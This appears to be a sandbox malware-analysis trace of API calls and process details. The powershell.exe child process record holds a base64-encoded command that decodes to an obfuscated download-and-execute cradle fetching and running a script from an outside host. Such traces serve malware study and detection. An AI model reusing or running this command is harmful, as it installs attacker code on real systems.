	[0913.178] recv (in: s=0x498, buf=0x2fa7580, len=5, flags=0 | out: buf=0x2fa7580*) returned 5
	[0913.178] recv (in: s=0x498, buf=0x2fa7585, len=16416, flags=0 | out: buf=0x2fa7585*) returned 435
	[0913.178] recv (in: s=0x498, buf=0x2fa7738, len=15981, flags=0 | out: buf=0x2fa7738*) returned 15981
	[0913.349] DecryptMessage (in: phContext=0x1c5ed8a0, pMessage=0x2fcef78, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2fcef78, pfQOP=0x0) returned 0x0
	[0913.350] recv (in: s=0x498, buf=0x2fa7580, len=5, flags=0 | out: buf=0x2fa7580*) returned 5
	[0913.350] recv (in: s=0x498, buf=0x2fa7585, len=16416, flags=0 | out: buf=0x2fa7585*) returned 4382
	[0913.350] recv (in: s=0x498, buf=0x2fa86a3, len=12034, flags=0 | out: buf=0x2fa86a3*) returned 12034
	[0913.443] DecryptMessage (in: phContext=0x1c5ed8a0, pMessage=0x2fcf1e0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2fcf1e0, pfQOP=0x0) returned 0x0
	[0913.443] recv (in: s=0x498, buf=0x2fa7580, len=5, flags=0 | out: buf=0x2fa7580*) returned 5
	[0913.443] recv (in: s=0x498, buf=0x2fa7585, len=16416, flags=0 | out: buf=0x2fa7585*) returned 825
	[0913.443] recv (in: s=0x498, buf=0x2fa78be, len=15591, flags=0 | out: buf=0x2fa78be*) returned 15008
	[0913.751] recv (in: s=0x498, buf=0x2fab35e, len=583, flags=0 | out: buf=0x2fab35e*) returned 583
	[0913.752] DecryptMessage (in: phContext=0x1c5ed8a0, pMessage=0x2fcf420, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2fcf420, pfQOP=0x0) returned 0x0
	[0913.753] recv (in: s=0x498, buf=0x2fa7580, len=5, flags=0 | out: buf=0x2fa7580*) returned 5
	[0913.753] recv (in: s=0x498, buf=0x2fa7585, len=16416, flags=0 | out: buf=0x2fa7585*) returned 8524
	[0913.754] recv (in: s=0x498, buf=0x2fa96d1, len=7892, flags=0 | out: buf=0x2fa96d1*) returned 3472
	[0913.841] recv (in: s=0x498, buf=0x2faa461, len=4420, flags=0 | out: buf=0x2faa461*) returned 280
	[0913.842] recv (in: s=0x498, buf=0x2faa579, len=4140, flags=0 | out: buf=0x2faa579*) returned 536
	[0913.842] recv (in: s=0x498, buf=0x2faa791, len=3604, flags=0 | out: buf=0x2faa791*) returned 3604
	[0913.848] DecryptMessage (in: phContext=0x1c5ed8a0, pMessage=0x2fcf660, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2fcf660, pfQOP=0x0) returned 0x0
	[0913.849] recv (in: s=0x498, buf=0x2fa7580, len=5, flags=0 | out: buf=0x2fa7580*) returned 5
	[0913.849] recv (in: s=0x498, buf=0x2fa7585, len=16416, flags=0 | out: buf=0x2fa7585*) returned 7647
	[0913.849] recv (in: s=0x498, buf=0x2fa9364, len=8769, flags=0 | out: buf=0x2fa9364*) returned 8769
	[0914.002] DecryptMessage (in: phContext=0x1c5ed8a0, pMessage=0x2fcf8c8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2fcf8c8, pfQOP=0x0) returned 0x0
	[0914.002] recv (in: s=0x498, buf=0x2fa7580, len=5, flags=0 | out: buf=0x2fa7580*) returned 5
	[0914.002] recv (in: s=0x498, buf=0x2fa7585, len=16416, flags=0 | out: buf=0x2fa7585*) returned 5162
	[0914.002] recv (in: s=0x498, buf=0x2fa89af, len=11254, flags=0 | out: buf=0x2fa89af*) returned 11254
	[0914.087] DecryptMessage (in: phContext=0x1c5ed8a0, pMessage=0x2fcfb08, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2fcfb08, pfQOP=0x0) returned 0x0
	[0914.091] recv (in: s=0x498, buf=0x2fa7580, len=5, flags=0 | out: buf=0x2fa7580*) returned 5
	[0914.092] recv (in: s=0x498, buf=0x2fa7585, len=16416, flags=0 | out: buf=0x2fa7585*) returned 2677
	[0914.092] recv (in: s=0x498, buf=0x2fa7ffa, len=13739, flags=0 | out: buf=0x2fa7ffa*) returned 11792
	[0914.292] recv (in: s=0x498, buf=0x2faae0a, len=1947, flags=0 | out: buf=0x2faae0a*) returned 1072
	[0914.293] recv (in: s=0x498, buf=0x2fab23a, len=875, flags=0 | out: buf=0x2fab23a*) returned 875
	[0914.556] DecryptMessage (in: phContext=0x1c5ed8a0, pMessage=0x2fcfd48, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2fcfd48, pfQOP=0x0) returned 0x0
	[0914.558] recv (in: s=0x498, buf=0x2fa7580, len=5, flags=0 | out: buf=0x2fa7580*) returned 5
	[0914.558] recv (in: s=0x498, buf=0x2fa7585, len=16416, flags=0 | out: buf=0x2fa7585*) returned 16416
	[0914.558] DecryptMessage (in: phContext=0x1c5ed8a0, pMessage=0x2fcff88, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2fcff88, pfQOP=0x0) returned 0x0
	[0914.559] recv (in: s=0x498, buf=0x2fa7580, len=5, flags=0 | out: buf=0x2fa7580*) returned 5
	[0914.559] recv (in: s=0x498, buf=0x2fa7585, len=16416, flags=0 | out: buf=0x2fa7585*) returned 6283
	[0914.559] recv (in: s=0x498, buf=0x2fa8e10, len=10133, flags=0 | out: buf=0x2fa8e10*) returned 3472
	[0914.572] recv (in: s=0x498, buf=0x2fa9ba0, len=6661, flags=0 | out: buf=0x2fa9ba0*) returned 280
	[0914.572] recv (in: s=0x498, buf=0x2fa9cb8, len=6381, flags=0 | out: buf=0x2fa9cb8*) returned 6381
	[0914.645] DecryptMessage (in: phContext=0x1c5ed8a0, pMessage=0x2fd01f0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2fd01f0, pfQOP=0x0) returned 0x0
	[0914.646] recv (in: s=0x498, buf=0x2fa7580, len=5, flags=0 | out: buf=0x2fa7580*) returned 5
	[0914.646] recv (in: s=0x498, buf=0x2fa7585, len=16416, flags=0 | out: buf=0x2fa7585*) returned 1118
	[0914.646] recv (in: s=0x498, buf=0x2fa79e3, len=15298, flags=0 | out: buf=0x2fa79e3*) returned 15298
	[0914.758] DecryptMessage (in: phContext=0x1c5ed8a0, pMessage=0x2fd0430, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2fd0430, pfQOP=0x0) returned 0x0
	[0914.759] recv (in: s=0x498, buf=0x2fa7580, len=5, flags=0 | out: buf=0x2fa7580*) returned 5
	[0914.759] recv (in: s=0x498, buf=0x2fa7585, len=16416, flags=0 | out: buf=0x2fa7585*) returned 777
	[0914.759] recv (in: s=0x498, buf=0x2fa788e, len=15639, flags=0 | out: buf=0x2fa788e*) returned 15639
	[0915.054] DecryptMessage (in: phContext=0x1c5ed8a0, pMessage=0x2fd0670, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2fd0670, pfQOP=0x0) returned 0x0
	[0915.055] recv (in: s=0x498, buf=0x2fa7580, len=5, flags=0 | out: buf=0x2fa7580*) returned 5
	[0915.055] recv (in: s=0x498, buf=0x2fa7585, len=16416, flags=0 | out: buf=0x2fa7585*) returned 436
	[0915.055] recv (in: s=0x498, buf=0x2fa7739, len=15980, flags=0 | out: buf=0x2fa7739*) returned 15980
	[0915.240] DecryptMessage (in: phContext=0x1c5ed8a0, pMessage=0x2fd08b0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2fd08b0, pfQOP=0x0) returned 0x0
	[0915.241] recv (in: s=0x498, buf=0x2fa7580, len=5, flags=0 | out: buf=0x2fa7580*) returned 5
	[0915.241] recv (in: s=0x498, buf=0x2fa7585, len=16416, flags=0 | out: buf=0x2fa7585*) returned 2239
	[0915.241] recv (in: s=0x498, buf=0x2fa7e44, len=14177, flags=0 | out: buf=0x2fa7e44*) returned 14177
	[0916.685] DecryptMessage (in: phContext=0x1c5ed8a0, pMessage=0x2fd0b18, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2fd0b18, pfQOP=0x0) returned 0x0
	[0916.686] recv (in: s=0x498, buf=0x2fa7580, len=5, flags=0 | out: buf=0x2fa7580*) returned 5
	[0916.686] recv (in: s=0x498, buf=0x2fa7585, len=16416, flags=0 | out: buf=0x2fa7585*) returned 290
	[0916.687] recv (in: s=0x498, buf=0x2fa76a7, len=16126, flags=0 | out: buf=0x2fa76a7*) returned 16126
	[0917.292] DecryptMessage (in: phContext=0x1c5ed8a0, pMessage=0x2fd0d80, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2fd0d80, pfQOP=0x0) returned 0x0
	[0917.293] recv (in: s=0x498, buf=0x2fa7580, len=5, flags=0 | out: buf=0x2fa7580*) returned 5
	[0917.293] recv (in: s=0x498, buf=0x2fa7585, len=16416, flags=0 | out: buf=0x2fa7585*) returned 16416
	[0917.293] DecryptMessage (in: phContext=0x1c5ed8a0, pMessage=0x2fd0fc0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2fd0fc0, pfQOP=0x0) returned 0x0
	[0917.294] recv (in: s=0x498, buf=0x2fa7580, len=5, flags=0 | out: buf=0x2fa7580*) returned 5
	[0917.294] recv (in: s=0x498, buf=0x2fa7585, len=16416, flags=0 | out: buf=0x2fa7585*) returned 16416
	[0917.294] DecryptMessage (in: phContext=0x1c5ed8a0, pMessage=0x2fd1200, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2fd1200, pfQOP=0x0) returned 0x0
	[0917.295] recv (in: s=0x498, buf=0x2fa7580, len=5, flags=0 | out: buf=0x2fa7580*) returned 5
	[0917.295] recv (in: s=0x498, buf=0x2fa7585, len=16416, flags=0 | out: buf=0x2fa7585*) returned 13203
	[0917.296] recv (in: s=0x498, buf=0x2faa918, len=3213, flags=0 | out: buf=0x2faa918*) returned 3213
	[0918.449] DecryptMessage (in: phContext=0x1c5ed8a0, pMessage=0x2fd1468, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2fd1468, pfQOP=0x0) returned 0x0
	[0918.450] recv (in: s=0x498, buf=0x2fa7580, len=5, flags=0 | out: buf=0x2fa7580*) returned 5
	[0918.450] recv (in: s=0x498, buf=0x2fa7585, len=16416, flags=0 | out: buf=0x2fa7585*) returned 16416
	[0918.450] DecryptMessage (in: phContext=0x1c5ed8a0, pMessage=0x2fd16a8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2fd16a8, pfQOP=0x0) returned 0x0
	[0918.451] recv (in: s=0x498, buf=0x2fa7580, len=5, flags=0 | out: buf=0x2fa7580*) returned 5
	[0918.451] recv (in: s=0x498, buf=0x2fa7585, len=16416, flags=0 | out: buf=0x2fa7585*) returned 7161
	[0918.451] recv (in: s=0x498, buf=0x2fa917e, len=9255, flags=0 | out: buf=0x2fa917e*) returned 9255
	[0918.669] DecryptMessage (in: phContext=0x1c5ed8a0, pMessage=0x2fd18e8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2fd18e8, pfQOP=0x0) returned 0x0
	[0918.670] recv (in: s=0x498, buf=0x2fa7580, len=5, flags=0 | out: buf=0x2fa7580*) returned 5
	[0918.670] recv (in: s=0x498, buf=0x2fa7585, len=16416, flags=0 | out: buf=0x2fa7585*) returned 1460
	[0918.670] recv (in: s=0x498, buf=0x2fa7b39, len=14956, flags=0 | out: buf=0x2fa7b39*) returned 14956
	[0918.992] DecryptMessage (in: phContext=0x1c5ed8a0, pMessage=0x2fd1b28, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2fd1b28, pfQOP=0x0) returned 0x0
	[0918.994] recv (in: s=0x498, buf=0x2fa7580, len=5, flags=0 | out: buf=0x2fa7580*) returned 5
	[0918.994] recv (in: s=0x498, buf=0x2fa7585, len=16416, flags=0 | out: buf=0x2fa7585*) returned 1655
	[0918.994] recv (in: s=0x498, buf=0x2fa7bfc, len=14761, flags=0 | out: buf=0x2fa7bfc*) returned 14761
	[0919.709] DecryptMessage (in: phContext=0x1c5ed8a0, pMessage=0x2fd1d90, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2fd1d90, pfQOP=0x0) returned 0x0
	[0919.710] recv (in: s=0x498, buf=0x2fa7580, len=5, flags=0 | out: buf=0x2fa7580*) returned 5
	[0919.710] recv (in: s=0x498, buf=0x2fa7585, len=4768, flags=0 | out: buf=0x2fa7585*) returned 242
	[0919.710] recv (in: s=0x498, buf=0x2fa7677, len=4526, flags=0 | out: buf=0x2fa7677*) returned 4526
	[0919.793] DecryptMessage (in: phContext=0x1c5ed8a0, pMessage=0x2fd1fd0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2fd1fd0, pfQOP=0x0) returned 0x0
	[0919.803] SetEvent (hEvent=0x394) returned 1
	[0927.488] CoTaskMemAlloc (cb=0x104) returned 0x28ea900
	[0927.488] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28ea900, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0927.489] CoTaskMemFree (pv=0x28ea900) 
	[0927.489] CoTaskMemAlloc (cb=0x104) returned 0x28ea900
	[0927.490] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x28ea900, nSize=0x80 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 0x24
	[0927.490] CoTaskMemFree (pv=0x28ea900) 
	[0927.492] CoTaskMemAlloc (cb=0x104) returned 0x28ea900
	[0927.493] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x28ea900, nSize=0x80 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 0x24
	[0927.493] CoTaskMemFree (pv=0x28ea900) 
	[0939.396] GetLongPathNameW (in: lpszShortPath="C:\\Users\\5P5NRG~1\\", lpszLongPath=0x1c5ed570, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned 0x1e
	[0939.397] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\vThQexNegi.dll", nBufferLength=0x105, lpBuffer=0x1c5ed5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\vThQexNegi.dll", lpFilePart=0x0) returned 0x3f
	[0939.397] SetErrorMode (uMode=0x1) returned 0x1
	[0939.397] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\vThQexNegi.dll" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\vthqexnegi.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffffffffffff
	[0954.505] SetErrorMode (uMode=0x1) returned 0x1
	[0954.510] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c5eaf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0954.510] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c5eae50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0954.510] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c5eae50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0954.510] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c5eae50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0955.623] CoTaskMemAlloc (cb=0x104) returned 0x28ea900
	[0955.623] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28ea900, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0955.624] CoTaskMemFree (pv=0x28ea900) 

Thread:
	id = 1995
	os_tid = 0x2710


Thread:
	id = 1996
	os_tid = 0x2718


Thread:
	id = 1998
	os_tid = 0x2724

	[0900.222] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0900.226] ResetEvent (hEvent=0x394) returned 1

Thread:
	id = 2033
	os_tid = 0x27b4


Thread:
	id = 2117
	os_tid = 0x1db8


Process:
	id = "88"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x679d8000"
	os_pid = "0x10f8"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 451
	os_tid = 0x10fc

	[0526.368] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0530.479] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0530.479] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0530.479] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0530.479] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0541.879] GetVersionExW (in: lpVersionInformation=0x26dbc0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x26dbc0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0541.882] GetVersionExW (in: lpVersionInformation=0x26dbc0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x26dbc0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0541.890] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0541.896] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0541.896] GetVersionExW (in: lpVersionInformation=0x26d930*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x26d930*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0541.897] SetErrorMode (uMode=0x1) returned 0x1
	[0541.898] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x26da90 | out: lpFileInformation=0x26da90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0541.899] SetErrorMode (uMode=0x1) returned 0x1
	[0541.995] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x26dd00 | out: lpdwHandle=0x26dd00) returned 0x94c
	[0541.997] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2cc72d8 | out: lpData=0x2cc72d8) returned 1
	[0542.000] VerQueryValueW (in: pBlock=0x2cc72d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x26dc78, puLen=0x26dc70 | out: lplpBuffer=0x26dc78*=0x2cc7374, puLen=0x26dc70) returned 1
	[0542.003] lstrlenW (lpString="䅁") returned 1
	[0542.866] VerQueryValueW (in: pBlock=0x2cc72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x26dbe8, puLen=0x26dbe0 | out: lplpBuffer=0x26dbe8*=0x2cc7450, puLen=0x26dbe0) returned 1
	[0542.867] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0542.872] CoTaskMemAlloc (cb=0x2e) returned 0x4349f0
	[0542.872] lstrcpyW (in: lpString1=0x4349f0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0542.873] CoTaskMemFree (pv=0x4349f0) 
	[0542.873] VerQueryValueW (in: pBlock=0x2cc72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x26dbe8, puLen=0x26dbe0 | out: lplpBuffer=0x26dbe8*=0x2cc74a4, puLen=0x26dbe0) returned 1
	[0542.874] lstrlenW (lpString="System.Management.Automation") returned 28
	[0542.874] CoTaskMemAlloc (cb=0x3c) returned 0x369860
	[0542.874] lstrcpyW (in: lpString1=0x369860, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0542.874] CoTaskMemFree (pv=0x369860) 
	[0542.874] VerQueryValueW (in: pBlock=0x2cc72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x26dbe8, puLen=0x26dbe0 | out: lplpBuffer=0x26dbe8*=0x2cc7500, puLen=0x26dbe0) returned 1
	[0542.874] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0542.874] CoTaskMemAlloc (cb=0x20) returned 0x432be0
	[0542.874] lstrcpyW (in: lpString1=0x432be0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0542.874] CoTaskMemFree (pv=0x432be0) 
	[0542.874] VerQueryValueW (in: pBlock=0x2cc72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x26dbe8, puLen=0x26dbe0 | out: lplpBuffer=0x26dbe8*=0x2cc7540, puLen=0x26dbe0) returned 1
	[0542.874] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0542.874] CoTaskMemAlloc (cb=0x44) returned 0x369860
	[0542.874] lstrcpyW (in: lpString1=0x369860, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0542.874] CoTaskMemFree (pv=0x369860) 
	[0542.874] VerQueryValueW (in: pBlock=0x2cc72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x26dbe8, puLen=0x26dbe0 | out: lplpBuffer=0x26dbe8*=0x2cc75a8, puLen=0x26dbe0) returned 1
	[0542.874] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0542.874] CoTaskMemAlloc (cb=0x76) returned 0x3cf600
	[0542.874] lstrcpyW (in: lpString1=0x3cf600, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0542.874] CoTaskMemFree (pv=0x3cf600) 
	[0542.875] VerQueryValueW (in: pBlock=0x2cc72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x26dbe8, puLen=0x26dbe0 | out: lplpBuffer=0x26dbe8*=0x2cc7644, puLen=0x26dbe0) returned 1
	[0542.875] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0542.875] CoTaskMemAlloc (cb=0x44) returned 0x369860
	[0542.875] lstrcpyW (in: lpString1=0x369860, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0542.875] CoTaskMemFree (pv=0x369860) 
	[0542.875] VerQueryValueW (in: pBlock=0x2cc72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x26dbe8, puLen=0x26dbe0 | out: lplpBuffer=0x26dbe8*=0x2cc76a8, puLen=0x26dbe0) returned 1
	[0542.875] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0542.875] CoTaskMemAlloc (cb=0x58) returned 0x3f2af0
	[0542.875] lstrcpyW (in: lpString1=0x3f2af0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0542.875] CoTaskMemFree (pv=0x3f2af0) 
	[0542.875] VerQueryValueW (in: pBlock=0x2cc72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x26dbe8, puLen=0x26dbe0 | out: lplpBuffer=0x26dbe8*=0x2cc7724, puLen=0x26dbe0) returned 1
	[0542.875] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0542.875] CoTaskMemAlloc (cb=0x20) returned 0x432be0
	[0542.875] lstrcpyW (in: lpString1=0x432be0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0542.875] CoTaskMemFree (pv=0x432be0) 
	[0542.875] VerQueryValueW (in: pBlock=0x2cc72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x26dbe8, puLen=0x26dbe0 | out: lplpBuffer=0x26dbe8*=0x2cc73cc, puLen=0x26dbe0) returned 1
	[0542.875] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0542.875] CoTaskMemAlloc (cb=0x66) returned 0x42d340
	[0542.875] lstrcpyW (in: lpString1=0x42d340, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
